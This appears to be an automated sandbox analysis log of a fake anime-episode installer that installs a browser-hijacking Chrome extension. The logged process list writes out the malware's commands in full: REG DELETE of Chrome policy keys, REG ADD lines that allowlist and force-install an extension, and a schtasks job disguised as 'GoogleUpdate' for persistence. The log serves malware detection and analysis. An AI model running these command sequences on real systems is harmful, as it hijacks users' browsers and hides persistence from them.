Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.408510272.000000000018D000.00000004.00000010.00020000.00000000.sdmp, is-NDGJF.tmp.3.drString found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.408510272.000000000018D000.00000004.00000010.00020000.00000000.sdmp, is-NDGJF.tmp.3.drString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.408510272.000000000018D000.00000004.00000010.00020000.00000000.sdmp, is-NDGJF.tmp.3.drString found in binary or memory: http://ocsp.digicert.com0A
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.408510272.000000000018D000.00000004.00000010.00020000.00000000.sdmp, is-NDGJF.tmp.3.drString found in binary or memory: http://ocsp.digicert.com0C
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.408510272.000000000018D000.00000004.00000010.00020000.00000000.sdmp, is-NDGJF.tmp.3.drString found in binary or memory: http://ocsp.digicert.com0X
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.408510272.000000000018D000.00000004.00000010.00020000.00000000.sdmp, is-NDGJF.tmp.3.drString found in binary or memory: http://ocsps.ssl.com0
Source: VC_redist.x64.exe, 0000001C.00000003.364850644.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, VC_redist.x64.exe, 0000001C.00000003.365160612.0000000003390000.00000004.00000020.00020000.00000000.sdmp, thm.xml.20.dr, thm.xml.18.drString found in binary or memory: http://wixtoolset.org/schemas/thmutil/2010
Source: VC_redist.x64.exe, 00000012.00000002.374125705.0000000003100000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://wixtoolset.org/schemas/thmutil/2010d=
Source: VC_redist.x64.exe, 00000012.00000002.374125705.0000000003100000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://wixtoolset.org/schemas/thmutil/2010le
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.408510272.000000000018D000.00000004.00000010.00020000.00000000.sdmp, is-NDGJF.tmp.3.drString found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
Source: Boku no Hero Academia 6th Season - Episode 13.exeString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000001.00000003.250432231.0000000003500000.00000004.00001000.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.exe, 00000002.00000003.410317140.0000000002304000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://smash.com
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000001.00000003.253560445.00000000025E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://smash.com1R
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.407483126.00000000024F4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://smash.com1RO
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000001.00000003.253560445.00000000025E4000.00000004.00001000.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.407483126.00000000024F4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://smash.com2
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000001.00000003.253560445.00000000025E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://smash.comiR
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.407483126.00000000024F4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://smash.comiRO
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.407001467.00000000024E6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://smashbrowser.com
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.408105135.0000000000A81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smashbrowser.com/welcome2.php
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.408105135.0000000000A81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smashbrowser.com/welcome2.php(
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.404958372.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.409480442.0000000000AEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smashbrowser.com/welcome2.php2
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.409374574.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.404893356.0000000000AC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smashbrowser.com/welcome2.php8
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.404958372.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.409434366.0000000000ADC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smashbrowser.com/welcome2.php:
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.408105135.0000000000A81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smashbrowser.com/welcome2.php=
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.407404878.00000000024ED000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://smashbrowser.com/welcome2.phpA
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.409693542.0000000003920000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smashbrowser.com/welcome2.phpC:
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.404958372.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.409480442.0000000000AEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smashbrowser.com/welcome2.phpJ6
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.404958372.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.409480442.0000000000AEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smashbrowser.com/welcome2.phpR
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.409391670.0000000000ACD000.00000004.00000020.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.404893356.0000000000AC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smashbrowser.com/welcome2.phpVH
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.404958372.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.409434366.0000000000ADC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smashbrowser.com/welcome2.phpb
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.404958372.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.409434366.0000000000ADC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smashbrowser.com/welcome2.phpeewi
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.408105135.0000000000A81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smashbrowser.com/welcome2.phpl
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.404958372.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.409480442.0000000000AEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smashbrowser.com/welcome2.phplW7
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.409410186.0000000000AD5000.00000004.00000020.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.404893356.0000000000AC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smashbrowser.com/welcome2.phpoft
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.404958372.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.409480442.0000000000AEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smashbrowser.com/welcome2.phpv7
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.409410186.0000000000AD5000.00000004.00000020.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.404893356.0000000000AC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smashbrowser.com/welcome2.phpwEI
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.404958372.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.409480442.0000000000AEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smashbrowser.com/welcome2.php~6s
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.409029766.0000000000A48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smashbrowser.com;4
Source: Boku no Hero Academia 6th Season - Episode 13.exe, 00000000.00000003.244618238.0000000002520000.00000004.00001000.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.exe, 00000000.00000003.245016813.000000007FBD0000.00000004.00001000.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.tmp, 00000001.00000000.248083178.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Boku no Hero Academia 6th Season - Episode 13.tmp.2.drString found in binary or memory: https://www.innosetup.com/
Source: Boku no Hero Academia 6th Season - Episode 13.exe, 00000000.00000003.244618238.0000000002520000.00000004.00001000.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.exe, 00000000.00000003.245016813.000000007FBD0000.00000004.00001000.00020000.00000000.sdmp, Boku no Hero Academia 6th Season - Episode 13.tmp, 00000001.00000000.248083178.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Boku no Hero Academia 6th Season - Episode 13.tmp.2.drString found in binary or memory: https://www.remobjects.com/ps
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.408510272.000000000018D000.00000004.00000010.00020000.00000000.sdmp, is-NDGJF.tmp.3.drString found in binary or memory: https://www.ssl.com/repository0
Source: unknownDNS traffic detected: queries for: accounts.google.com
Source: Boku no Hero Academia 6th Season - Episode 13.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeFile deleted: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\3cd703.msi
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: String function: 0005061A appears 34 times
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: String function: 00011F20 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: String function: 000531C7 appears 83 times
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: String function: 000137D3 appears 496 times
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: String function: 0005012F appears 677 times
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: String function: 000F012F appears 678 times
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: String function: 000F061A appears 34 times
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: String function: 000B1F20 appears 54 times
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: String function: 000F31C7 appears 83 times
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: String function: 000B37D3 appears 496 times
Source: Boku no Hero Academia 6th Season - Episode 13.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: Boku no Hero Academia 6th Season - Episode 13.tmp.2.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: mfc140deu.dll.15.drStatic PE information: No import functions for PE file found
Source: mfc140rus.dll.15.drStatic PE information: No import functions for PE file found
Source: mfc140cht.dll.15.drStatic PE information: No import functions for PE file found
Source: mfc140jpn.dll.15.drStatic PE information: No import functions for PE file found
Source: mfc140kor.dll.15.drStatic PE information: No import functions for PE file found
Source: mfc140fra.dll.15.drStatic PE information: No import functions for PE file found
Source: mfc140chs.dll.15.drStatic PE information: No import functions for PE file found
Source: mfc140esn.dll.15.drStatic PE information: No import functions for PE file found
Source: mfc140ita.dll.15.drStatic PE information: No import functions for PE file found
Source: mfc140enu.dll.15.drStatic PE information: No import functions for PE file found
Source: Boku no Hero Academia 6th Season - Episode 13.exe, 00000000.00000003.255058911.00000000022E8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs Boku no Hero Academia 6th Season - Episode 13.exe
Source: Boku no Hero Academia 6th Season - Episode 13.exe, 00000000.00000000.243931389.00000000004C6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs Boku no Hero Academia 6th Season - Episode 13.exe
Source: Boku no Hero Academia 6th Season - Episode 13.exe, 00000000.00000003.244618238.0000000002520000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs Boku no Hero Academia 6th Season - Episode 13.exe
Source: Boku no Hero Academia 6th Season - Episode 13.exe, 00000000.00000003.245016813.000000007FBD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs Boku no Hero Academia 6th Season - Episode 13.exe
Source: Boku no Hero Academia 6th Season - Episode 13.exe, 00000002.00000003.410259634.00000000022D8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs Boku no Hero Academia 6th Season - Episode 13.exe
Source: Boku no Hero Academia 6th Season - Episode 13.exeBinary or memory string: OriginalFileName vs Boku no Hero Academia 6th Season - Episode 13.exe
Source: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exeSection loaded: tsappcmp.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dll
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG DELETE HKLM\SOFTWARE\Policies\Google\Chrome /f
Source: C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exeFile read: C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe
Source: C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknownProcess created: C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe
Source: C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exeProcess created: C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp "C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp" /SL5="$30408,24635135,780800,C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe"
Source: C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpProcess created: C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe "C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe" /SILENT
Source: C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exeProcess created: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp "C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp" /SL5="$2040C,24635135,780800,C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe" /SILENT
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpProcess created: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exe "C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exe" /install /quiet
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeProcess created: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe "C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe" -burn.clean.room="C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exe" -burn.filehandle.attached=588 -burn.filehandle.self=628 /install /quiet
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeProcess created: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exe "C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{E9871BE9-995B-4EFF-BA27-126D1FC36700} {ED4F63C9-39F6-4A7D-A76D-4B8F059F42ED} 5372
Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: unknownProcess created: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe "C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe" /burn.runonce
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeProcess created: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe "C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe" /quiet /burn.log.append "C:\Users\user\AppData\Local\Temp\dd_vcredist_amd64_20230102153454.log" /install
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeProcess created: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe "C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe" -burn.clean.room="C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe" -burn.filehandle.attached=588 -burn.filehandle.self=564 /quiet /burn.log.append "C:\Users\user\AppData\Local\Temp\dd_vcredist_amd64_20230102153454.log" /install
Source: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exeProcess created: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe "C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -uninstall -quiet -burn.related.upgrade -burn.ancestors={d4cecf3b-b68f-4995-8840-52ea0fab646e} -burn.filehandle.self=1008 -burn.embedded BurnPipe.{652D427C-3FCF-4F57-9B0A-0FFBCA2578FC} {CF7111B3-FF83-47BF-A56D-0E99B89A84C1} 5468
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeProcess created: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe "C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -burn.clean.room="C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -burn.filehandle.attached=540 -burn.filehandle.self=564 -uninstall -quiet -burn.related.upgrade -burn.ancestors={d4cecf3b-b68f-4995-8840-52ea0fab646e} -burn.filehandle.self=1008 -burn.embedded BurnPipe.{652D427C-3FCF-4F57-9B0A-0FFBCA2578FC} {CF7111B3-FF83-47BF-A56D-0E99B89A84C1} 5468
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeProcess created: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe "C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{9F679354-B01C-4132-8C3B-9D0B8BAD9686} {7ADE5D70-631D-453D-B602-70E5C1B36EAF} 3732
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeProcess created: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe "C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -uninstall -quiet -burn.related.upgrade -burn.ancestors={d4cecf3b-b68f-4995-8840-52ea0fab646e} -burn.filehandle.self=900 -burn.embedded BurnPipe.{8ADE75BE-8C64-4D11-B05A-A6C78AECD63F} {6EE058D7-D097-43E8-87F0-A357D97D5238} 1324
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeProcess created: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe "C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -burn.clean.room="C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -burn.filehandle.attached=576 -burn.filehandle.self=572 -uninstall -quiet -burn.related.upgrade -burn.ancestors={d4cecf3b-b68f-4995-8840-52ea0fab646e} -burn.filehandle.self=900 -burn.embedded BurnPipe.{8ADE75BE-8C64-4D11-B05A-A6C78AECD63F} {6EE058D7-D097-43E8-87F0-A357D97D5238} 1324
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeProcess created: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe "C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{DC57C196-DCD2-4148-818F-F83AAF0E5C46} {63FE371D-956D-4D2B-988F-00929D1EE668} 2140
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpProcess created: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exe "C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exe" install
Source: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\WindowsApp\chrome.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /Create /XML "C:\Users\user\AppData\Local\WindowsApp\reg.xml" /tn GoogleUpdate
Source: unknownProcess created: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exe C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exe
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\WindowsApp\reg.bat" install
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /Create /XML "C:\Users\user\AppData\Local\WindowsApp\reg.xml" /tn GoogleUpdate
Source: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\WindowsApp\chrome.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG DELETE HKLM\SOFTWARE\Policies\Google\Chrome /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG DELETE HKLM\SOFTWARE\Google\Chrome\Extensions\dbffglanhdhedkjkijpkplhpcdndpchj /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG DELETE HKLM\SOFTWARE\WOW6432Node\Google\Chrome\Extensions\dbffglanhdhedkjkijpkplhpcdndpchj /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Google\Chrome\ExtensionInstallAllowlist" /v "1" /t REG_SZ /d dbffglanhdhedkjkijpkplhpcdndpchj /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Google\Chrome\Extensions\dbffglanhdhedkjkijpkplhpcdndpchj" /v "path" /t REG_SZ /d "C:\Users\user\AppData\Local\WindowsApp\apps-helper\apps.crx" /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Google\Chrome\Extensions\dbffglanhdhedkjkijpkplhpcdndpchj" /v "version" /t REG_SZ /d 1.0 /f
Source: C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exeProcess created: C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp "C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp" /SL5="$30408,24635135,780800,C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe"
Source: C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpProcess created: C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe "C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe" /SILENT
Source: C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exeProcess created: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp "C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp" /SL5="$2040C,24635135,780800,C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe" /SILENT
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpProcess created: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exe "C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exe" /install /quiet
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_000144E9 GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,AdjustTokenPrivileges,GetLastError,Sleep,InitiateSystemShutdownExW,GetLastError,CloseHandle,4_2_000144E9
